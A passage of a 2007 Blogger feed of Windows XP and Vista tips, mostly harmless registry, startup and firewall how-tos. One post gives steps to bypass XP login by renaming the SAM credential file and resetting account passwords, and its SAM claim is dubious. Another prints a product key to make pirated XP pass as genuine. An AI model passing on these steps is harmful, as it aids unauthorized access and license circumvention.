click the 'add' button. &lt;br /&gt;&lt;br /&gt;This window will add the application that you are using to the firewall's list of data that is allowed into your computer. &lt;br /&gt;&lt;br /&gt;You will need to find out the port that your application uses. This information should be available from the documentation or from the software manufacturer's website. &lt;br /&gt;&lt;br /&gt;Input a description for your convenience, then the computer name or IP address of the computer that is hosting the program, then put the port number that the program uses. Note that as long as the program is running on the computer that uses the XP firewall, the internal and external port will be the same. &lt;br /&gt;&lt;br /&gt;Click 'ok' to apply the rule. Your firewall will now allow connections through the port you specified.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-5451522565776175340?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/5451522565776175340/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=5451522565776175340&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/5451522565776175340'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/5451522565776175340'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/hosting-online-games-through-windows-xp.html' title='Hosting online games through the Windows XP firewall'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-8967119395254208799</id><published>2007-10-01T23:41:00.002+10:00</published><updated>2007-10-01T23:47:41.426+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop Tips'/><title type='text'>Automatically run programs when starting Windows</title><content type='html'>If there are applications or commands that you run every single time you start your computer (Email comes to mind) you may want to consider setting things up so that these programs run automatically during the Windows XP startup. This can be done quite easily in XP by creating shortcuts and shuffling them around. &lt;br /&gt;&lt;br /&gt;Here's how: Windows XP has a startup folder located at 'C:\ Documents and Settings\ (your user name)\ Start Menu\ Programs\Startup.' Shortcuts placed into this folder will be run automatically when Windows XP starts up. &lt;br /&gt;&lt;br /&gt;If you already have shortcuts for the programs you desire to use, copy and paste them into the startup folder. Otherwise, go to 'start\programs,' select the program you would like to create a shortcut for, right click it and select 'send to' then 'desktop.' This will create a shortcut on the desktop that you can then use.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-8967119395254208799?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/8967119395254208799/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=8967119395254208799&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8967119395254208799'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8967119395254208799'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/automatically-run-programs-when.html' title='Automatically run programs when starting Windows'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-6707302162284019451</id><published>2007-10-01T23:41:00.001+10:00</published><updated>2007-10-01T23:47:41.426+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop Tips'/><title type='text'>Breaking The XP Password:</title><content type='html'>In case of user password boot the pc in safemode by pressing the F8 key and then selecting the Safe Mode option. You can now logon as an administrator and XP wont prompt for the password. Incase of an administrator account try rebooting the pc in DOS. access C:\Windows\system32\config\sam . Rename SAM as SAM.mj&lt;br /&gt;Now XP wont ask for password next time You Login. Also&lt;br /&gt;&lt;br /&gt;Go to the cmd prompt . &lt;br /&gt;Type net user *. &lt;br /&gt;It will list all the users. &lt;br /&gt;Again type net user "administrator" or the name of the administrator "name" *. &lt;br /&gt;e.g.: net user aaaaaa *(where aaaaaa is the name). &lt;br /&gt;It will ask for the password. &lt;br /&gt;Type the password and there you are done. &lt;br /&gt;Logging In As Administrator:&lt;br /&gt;&lt;br /&gt;Hold the Ctrl-Alt key and press Del twice. This will bring up the normal login and you can log on as Administrator. &lt;br /&gt;&lt;br /&gt;To unhide the Administrator account so it does show up:&lt;br /&gt;&lt;br /&gt;Start Regedit &lt;br /&gt;&lt;br /&gt;Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList &lt;br /&gt;&lt;br /&gt;Unhide the Administrator key by giving it a value of 1&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-6707302162284019451?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/6707302162284019451/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=6707302162284019451&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6707302162284019451'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6707302162284019451'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/breaking-xp-password.html' title='Breaking The XP Password:'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-494973995702359915</id><published>2007-10-01T23:40:00.002+10:00</published><updated>2007-10-01T23:49:07.755+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hard Disk OR Drivers'/><title type='text'>Convert a FAT partition to NTFS</title><content type='html'>Click Start, click Programs, and then click Command Prompt.&lt;br /&gt;In Windows XP, click Start, click Run, type cmd and then click OK.&lt;br /&gt;At the command prompt, type CONVERT [driveletter]: /FS:NTFS. &lt;br /&gt;Convert.exe will attempt to convert the partition to NTFS.&lt;br /&gt;NOTE: Although the chance of corruption or data loss during the conversion from FAT to NTFS is minimal, it is best to perform a full backup of the data on the drive that it is to be converted prior to executing the convert command. It is also recommended to verify the integrity of the backup before proceeding, as well as to run RDISK and update the emergency repair disk (ERD).&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-494973995702359915?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/494973995702359915/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=494973995702359915&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/494973995702359915'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/494973995702359915'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/convert-fat-partition-to-ntfs.html' title='Convert a FAT partition to NTFS'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-3899568841546129882</id><published>2007-10-01T23:40:00.001+10:00</published><updated>2007-10-01T23:47:41.427+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop Tips'/><title type='text'>Disabling Unnecessary Programs At Startup</title><content type='html'>Many programs add portions of themselves starting automatically on every login.This can be either in the Startup Folder or the Registry. One easy way to tell is by looking at how many icons are in your system tray. If you have a large number, perhaps unnecessary resources are being allocated them as well as increasing your boot time. Typical examples are Microsoft Office, Office FindFast, Real Player, ATI &lt;a href=" http://www.orkut.com/archive/video"&gt;Video&lt;/a&gt; setting etc. You can remove them in one of three main ways: &lt;br /&gt;&lt;br /&gt;In the Start / Programs / Startup Folder &lt;br /&gt;In the Registry under HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-3899568841546129882?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/3899568841546129882/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=3899568841546129882&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/3899568841546129882'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/3899568841546129882'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/disabling-unnecessary-programs-at.html' title='Disabling Unnecessary Programs At Startup'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-3643658346608620504</id><published>2007-10-01T23:39:00.001+10:00</published><updated>2007-10-01T23:47:41.427+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop Tips'/><title type='text'>Renaming The Start Button</title><content type='html'>To rename the start button, you will need a hex editor.&lt;br /&gt;My preference is UltraEdit&lt;br /&gt;&lt;br /&gt;Copy the \windows\explore.exe file to a new name (e.g. explorer_1.exe) &lt;br /&gt;With the hex editor, open that file and go to offset 412b6 &lt;br /&gt;You will see the word start with blanks between each letter &lt;br /&gt;Edit it be any 5 characters or less &lt;br /&gt;Save the file &lt;br /&gt;Boot to DOS &lt;br /&gt;Copy the existing c:\windows\explorer.exe to explorer.org &lt;br /&gt;Copy explorer_1.exe to explorer.exe &lt;br /&gt;You will also need to replace the explorer.exe in the c:\windows\system32\dllcache file as well with the new one. &lt;br /&gt;Note: If the partition is NTFS and you can't access the files from DOS: &lt;br /&gt;&lt;br /&gt;Start Regedit &lt;br /&gt;Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon. &lt;br /&gt;Change the value of Shell from Explorer.exe to explorer_1.exe&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-3643658346608620504?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/3643658346608620504/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=3643658346608620504&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/3643658346608620504'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/3643658346608620504'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/renaming-start-button.html' title='Renaming The Start Button'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-6516944264713715367</id><published>2007-10-01T23:38:00.001+10:00</published><updated>2007-10-01T23:49:57.902+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet Explorer Tips'/><title type='text'>Increase the Internet Speed:</title><content type='html'>To Increase the Internet Speed:&lt;br /&gt;Open Notepad and paste the below code in it. &lt;br /&gt;&lt;br /&gt;[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]&lt;br /&gt;"SackOpts"=dword:00000001&lt;br /&gt;"TcpWindowSize"=dword:0005ae4c &lt;br /&gt;"Tcp1323Opts"=dword:00000003 &lt;br /&gt;"DefaultTTL"=dword:00000040&lt;br /&gt;"EnablePMTUBHDetect"=dword:00000000&lt;br /&gt;"EnablePMTUDiscovery"=dword:00000001&lt;br /&gt;"GlobalMaxTcpWindowSize"=dword:0005ae4c &lt;br /&gt;&lt;br /&gt;Now save this file as speed.reg. Execute it and observe the change!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-6516944264713715367?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/6516944264713715367/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=6516944264713715367&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6516944264713715367'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6516944264713715367'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/increase-internet-speed.html' title='Increase the Internet Speed:'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-7283110182979093031</id><published>2007-10-01T23:37:00.002+10:00</published><updated>2007-10-01T23:47:41.427+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop Tips'/><title type='text'>Removing Multiple Boot Screens</title><content type='html'>Removing Multiple Boot Screens:&lt;br /&gt;If you are getting unwanted multiple boot screen&lt;br /&gt;Then Follow these Steps.&lt;br /&gt;1&gt; Right Click on My Computer&lt;br /&gt;2&gt;Select Properties&lt;br /&gt;3&gt;Select Advanced Tab&lt;br /&gt;4&gt;Select Settings In the Startup &amp; Recovery Section(3rd grp) &lt;br /&gt;5&gt;Select the operating system which u want.&lt;br /&gt;6&gt;And Click OK.&lt;br /&gt;7&gt;Further again press the setting and click on Edit.&lt;br /&gt;8&gt;It will open boot.ini File.&lt;br /&gt;9&gt;Now u can delete those o/s which you don't want to be displayed. &lt;br /&gt;&lt;br /&gt;Note: For deleting operating systems from boot.ini file, keep it mind that you can't&lt;br /&gt;delete that o/s which is selected by default there. Before&lt;br /&gt;making any changes make a copy of boot.ini file.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-7283110182979093031?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/7283110182979093031/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=7283110182979093031&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/7283110182979093031'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/7283110182979093031'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/removing-multiple-boot-screens.html' title='Removing Multiple Boot Screens'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-2503511445702235277</id><published>2007-10-01T23:37:00.001+10:00</published><updated>2007-10-01T23:47:41.427+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop Tips'/><title type='text'>Modify Color Selection of Default Theme</title><content type='html'>Modify Color Selection of Default Theme:&lt;br /&gt;Open registry by going to Start then Run. Entering regedit, navigate to [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager] and locate the key "ColorName".&lt;br /&gt;Right Click on it and select modify its value from "NormalColor" to "Metallic" &lt;br /&gt;Click Ok, and exit regedit and restart your computer.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-2503511445702235277?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/2503511445702235277/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=2503511445702235277&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/2503511445702235277'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/2503511445702235277'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/modify-color-selection-of-default-theme.html' title='Modify Color Selection of Default Theme'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-6100931611173877767</id><published>2007-10-01T23:36:00.001+10:00</published><updated>2007-10-01T23:47:41.427+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop Tips'/><title type='text'>Creating The Suspend Shortcut</title><content type='html'>Right click on the Desktop .New / Shortcut. Enter in rundll32.exe PowrProf.dll, SetSuspendState . Give it whatever name you want. Now when you click on that shortcut, your computer will shutdown and suspend.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-6100931611173877767?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/6100931611173877767/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=6100931611173877767&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6100931611173877767'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6100931611173877767'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/creating-suspend-shortcut.html' title='Creating The Suspend Shortcut'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-2118731517723320287</id><published>2007-10-01T23:35:00.000+10:00</published><updated>2007-10-01T23:49:07.755+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hard Disk OR Drivers'/><title type='text'>Using advanced file security settings in विन्डोज़ NTFS</title><content type='html'>Using advanced file security settings in Windows&lt;br /&gt;Windows XP is based on the same platform as Windows 2000, and shares that operating system's robust file security options, at least when using the NTFS file system. Unfortunately this security system, which enables an administrator to decide exactly which files and programs any given user will have access to, is not actually implemented by default in Windows XP. This is a concession Microsoft made to avoid confusing basic users of XP Pro, and to cripple XP Home. &lt;br /&gt;&lt;br /&gt;The NTFS file security options can be enabled easily enough in XP Pro, but are apparently non-existent in the Home version. Fact is, the tools are there, you just need to look a little bit harder. &lt;br /&gt;&lt;br /&gt;To enable NTFS file security in Windows XP Home: First you need to assure that at least your main hard drive is formatted with the NTFS file system. See tip #61 for instructions on this. Restart your system. Just after the memory and BIOS check screen, but before the Windows splash screen comes up, press F8 a few times. &lt;br /&gt;&lt;br /&gt;When the Windows boot menu appears, select 'safe mode' from the list of options. &lt;br /&gt;&lt;br /&gt;Once Windows has loaded in safe mode, right click the folders and files you would like to change access to. You will notice that the 'security' tab now exists, and thus you are allowed to assign or deny access to individual users for each file, folder and program. Once you are done, restart Windows normally, and your changes will be enforced.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-2118731517723320287?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/2118731517723320287/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=2118731517723320287&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/2118731517723320287'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/2118731517723320287'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/using-advanced-file-security-settings.html' title='Using advanced file security settings in विन्डोज़ NTFS'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-2680891571040388911</id><published>2007-10-01T23:34:00.000+10:00</published><updated>2007-10-01T23:47:41.427+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop Tips'/><title type='text'>Adding Administrative Tools Icon To The Desktop</title><content type='html'>Open Registry Editor. In Registry Editor, navigate to the following registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace . Create the following key: {D20EA4E1-3957-11d2-A40B-0C5020524153} (just copy/paste, including the brackets). Close Registry Editor. There is no need to reboot. Just wait a few seconds and see how the icon appears.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-2680891571040388911?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/2680891571040388911/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=2680891571040388911&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/2680891571040388911'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/2680891571040388911'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/adding-administrative-tools-icon-to.html' title='Adding Administrative Tools Icon To The Desktop'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-914145618025157051</id><published>2007-10-01T23:33:00.000+10:00</published><updated>2007-10-01T23:47:41.428+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop Tips'/><title type='text'>MAKING WINDOWS XP GENUINE THE EASY WAY</title><content type='html'>download jellybean keyfinder from this website &lt;br /&gt;http://www.magicaljellybean.com/keyfinder.shtml &lt;br /&gt;&lt;br /&gt;Now open keyfinder.exe &lt;br /&gt;Click on options and click "change windows key"&lt;br /&gt;Now enter this key and you're done. &lt;br /&gt;*****************************&lt;br /&gt;V2C47-MK7JD-3R89F-D2KXW-VPK3J &lt;br /&gt;***************************** &lt;br /&gt;&lt;br /&gt;P.S: this works on windows xp sp2 only...... &lt;br /&gt;&lt;br /&gt;ppl u can try this out...&lt;br /&gt;this might sound silly but it works perfectly...&lt;br /&gt;&lt;br /&gt;TRY INSTALLING IE7 OR MEDIA PLAYER11.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-914145618025157051?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/914145618025157051/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=914145618025157051&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/914145618025157051'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/914145618025157051'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/10/making-windows-xp-genuine-easy-way.html' title='MAKING WINDOWS XP GENUINE THE EASY WAY'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-4718859858398904303</id><published>2007-09-27T16:10:00.000+10:00</published><updated>2007-10-01T23:32:38.927+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop Tips'/><title type='text'>Unlock the supersecret Admin account in vista</title><content type='html'>Deep inside the bowels of Windows Vista, there's a secret Administrator account, and it's different from the normal administrator account you most likely have set up on your PC. This Administrator account is not part of the Administrator group. (Confused yet? You should be.) It's a kind of superadministrator, akin to the root account in Unix, and by default it's turned off and hidden. (In describing this hack, we'll always use the capital "A" for the secret Administrator account, and a lowercase "a" for a normal administrator account.) In versions of Windows before Windows Vista, the Administrator account wasn't hidden, and many people used it as their main or only account. This Administrator account had full rights over the computer. &lt;br /&gt;&lt;br /&gt;In Windows Vista, Microsoft changed that. In Vista, the Administrator account is not subject to UAC, but normal administrator accounts are. So the Administrator can make any changes to the system and will see no UAC prompts.&lt;br /&gt;&lt;br /&gt;Turning on the Administrator account is straightforward. First, open an elevated command prompt by typing cmd into the Search box on the Start menu, right-clicking the command prompt icon that appears at the top of the Start menu, then selecting Run as administrator -- or just use the shortcut you created in the previous hack.&lt;br /&gt;&lt;br /&gt;Then enter this command and press Enter:&lt;br /&gt;&lt;br /&gt;Net user administrator /active:yes&lt;br /&gt;&lt;br /&gt;From now on, the Administrator account will appear as an option on the Welcome screen, along with any user accounts you may have set up. Use it like any other account. Be aware that it won't have a password yet, so it's a good idea to set a password for it.&lt;br /&gt;&lt;br /&gt;If you want to disable the account and hide it, enter this command at an elevated command prompt and press Enter:&lt;br /&gt;&lt;br /&gt;Net user administrator /active:no&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-4718859858398904303?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/4718859858398904303/comments/default' title='Post 